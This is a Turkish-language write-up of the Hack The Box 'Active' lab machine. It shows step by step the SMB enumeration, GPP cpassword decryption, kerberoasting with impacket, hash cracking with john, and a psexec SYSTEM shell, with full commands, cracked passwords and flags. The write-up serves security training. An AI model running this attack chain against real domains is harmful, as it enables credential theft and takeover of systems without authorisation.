| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Active - HTB | Kolay | Windows |
Walkthrough
Nmap taraması ile başlayalım.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 08:05 EDT
Nmap scan report for 10.10.10.100
Host is up (0.16s latency).
Not shown: 65512 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54
OS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W
OS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%
OS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 13m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-27T12:32:20
|_ start_date: 2021-07-27T05:05:54
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 189.49 ms 10.10.16.1
2 73.41 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 811.04 seconds
Bir DC olduğu çok belli ve domain adımız: active.htb
Hemen smb ile enum yapmaya başlayalım. enum4linux çıktısında dikkat çekici olan kısımları aşağıda paylaşıyorum.
=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U''%'' -c dir 2>&1
//10.10.10.100/Users Mapping: DENIED, Listing: N/A
smbmap ile'de kontrol ettiğimizde aynı çıktıları alıyooruz.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "" -p "" -H 10.10.10.100 2 ⨯
[+] IP: 10.10.10.100:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Şimdi smbclient ile içeri girelim ve neler var neler yok bakalım. İçeride group ploicy'ler vardı ve buradan kullanıcı parolası elde edebilir miyim diye düşünmeye başlamıştım. https://adsecurity.org/?p=2288 yazısı bu konuyu açıklamaktadır. Araştırmalarım sonucu kullanıcı verileri buldum.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
10459647 blocks of size 4096. 5727923 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.9 KiloBytes/sec)
Bu dosyayı okuduğumuzda SVC_TGS kullanıcısının parolası kırılmayı bekliyordu.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Yukarıda vermiş olduğum linkte kullanılan ps1 scriptini indirdim ve kalide powershell açıp parolayı kırdım. (https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-DecryptedCpassword)
┌──(root💀kali)-[~/oscp/htb/Active]
└─# pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
I
PS /root/oscp/htb/Active> ls
'a a' enum4linuxResult Get-DecryptedCpassword.ps1 GPE.INI GPT.INI GptTmpl.inf Groups.xml
PS /root/oscp/htb/Active> Import-Module ./Get-DecryptedCpassword.ps1
PS /root/oscp/htb/Active> Get-DecryptedCpassword "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
PS /root/oscp/htb/Active> exit
Artık bir kullanıcıya sahibiz. İçeriye hala giremiyordum bunun üzerine okuyamadığım paylaşılmış klasörleri belki bu kullanıcı ile okurum diye tekrar smb enum yaptım.
=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_PARAMETER listing \*
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
//10.10.10.100/Users Mapping: OK, Listing: OK
Elimizdeki kullaıcıyla daha fazla haklara ahibiz.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100 1 ⨯
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
İlk flagi böylece almış oldum.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' 2>&1
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5727623 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
cd
10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\> cd Desktop\
lsmb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat user.txt
86d67d8ba232bb6a254aa4d10159e983
Artık ıkanmıştım ve bloodhound'ı çalıştırdım. LDAP sorguları ile bilgi toplama zamanı.
┌──(root💀kali)-[~/oscp/htb/Active/bloodhound]
└─# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb -ns 10.10.10.100 -c all
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 4 users
INFO: Found 40 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
Bloodhound incelemelerimde Administrator kullanıcısının SPN dğeri olduğunu keşfettim. Bunun üzerine hemen hash talebinde bulundum. Ancak hata aldım.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request 1 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Böyle bir hata aldığınızda zaman değerimizi DC ile eşitlelememiz gerekiyor.(https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast)
┌──(root💀kali)-[~/oscp/htb/Active]
└─# ntpdate 10.10.10.100
27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec
Tekrar deneyelim.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat /etc/resolv.conf
nameserver 10.10.10.100
┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$27a9be7702cf025d854f726fe25fdffd$a127e1b0d9ed078c32358ae41887465201c909d4e8ce32b95e708b421c53a5b9e290f2a6ba1cdc96d1ce95adf32c8559672c7a2d870c2b6db4f412561dd983cca2fcbc4c065e2a90068d285a3724cdc9231121eed47404dde01dcd2209b86379c13ab5c1d167cc6acd679c827f0ba1e5d5b513050e8bd6d2e7b9a35ae78ed26355832819ac348123cbd1c7269ff328c7c061dc28e743dca66a5d701da71cf7390a6acf00f9d1679d5fc6e7741f71e2d2b3bb751cdaa389756461423e2c8545c116f816a51e8efbbd0fe5b83cee135f9f870889cf9deeedd03da60155e92aa08c8fc73c1a6da5b591972409fe7eaa3d0908e04cde1060c3f8a6e4c5e2d1fac10fa5e2d6e042c054ed186553d1c08606b27fdf2bdaf3962c794c57423d4aecbc7eda24417cb41a125ba13fe4b8a4dfde5c600132f846d25b28d215118db3bb13b21f20d3661e7bd06a4ef1b287bc828303fda8e7e23d415a512b5e274282af3491309a146624d7078a1b7d206b3bc674ee5b0594324c4e2f47fc2594e076c018b41e357d6e28086b9221fa84fe75f2e31230108261fcd1e2e861f850ba13b8bb62f2951d58f0aa35dfec0ac4cbe3c328169fcfdf1af0f58aec8adc4e912b4e94c85f31bc6a322ec583c520ce3951f17da872f021cc2b1a94daa1a223d7151d242617640452b374b79cb0fff429c4a6cf944c6b6565b275bc9ace246fb86fac6f9ecb417a87bb258e848126edda737dbbcaaa7d2c55dfde8c02f0511007b445cbfa93f2cd036081418b08dff899543c875f11810ff730dd0c503c87bd1c1705ceec297a3e62f5f0cfa9a466833799bdd072546686d35010937c27b5f94f22384cd7be16a24920fd58bc6421c45962eddf9b9aaba4c3dc89f5896bf1d9f87bd26b55eac96603de1ad65dd4036b3ba64b1160411946e41a54e088b127f4e17b70f8660bdde4a0adaddbbf4c9f8f262c2e98f7ad66f79c870b9d1f06c0bf5cf19f1386f18f3eec0865c256c54645ec90237b9841cfe5ad0ecea41b7755330b7e065636b96d84c6bdcb66029b8c5327fc32df3a036631bc406f485ea9e919ad0e06c8cc1c1bd3fc8507612c8d4c7af0ce1707fe0bb00966d846202c7116a49aebbbda02e5451693a3f17665a69127c438bfef8c07606e83e468c701d723a18705bfc83d0e4e48bd58464eb20eb6680c1537b7c61ad6a25aefab47605533f0c8fd44acaf98cc002dee0cc221c93148df0ab4a9a330381d04ce891e6588ef
Harika şimdi bunu kıralım.
┌──(root💀kali)-[~/oscp/htb/Active]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g/s 2246Kp/s 2246Kc/s 2246KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌──(root💀kali)-[~/tool/AD/impacket/examples]
└─# python3 psexec.py Administrator:[email protected]
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ONeZjpOH.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service iDPJ on 10.10.10.100.....
[*] Starting service iDPJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop\
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2AF3-72E4
Directory of C:\Users\Administrator\Desktop
21/01/2021 07:49 úú <DIR> .
21/01/2021 07:49 úú <DIR> ..
21/07/2018 06:06 úú 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 23.460.220.928 bytes free
C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b
C:\Users\Administrator\Desktop>
İlk Yorumu Siz Yapın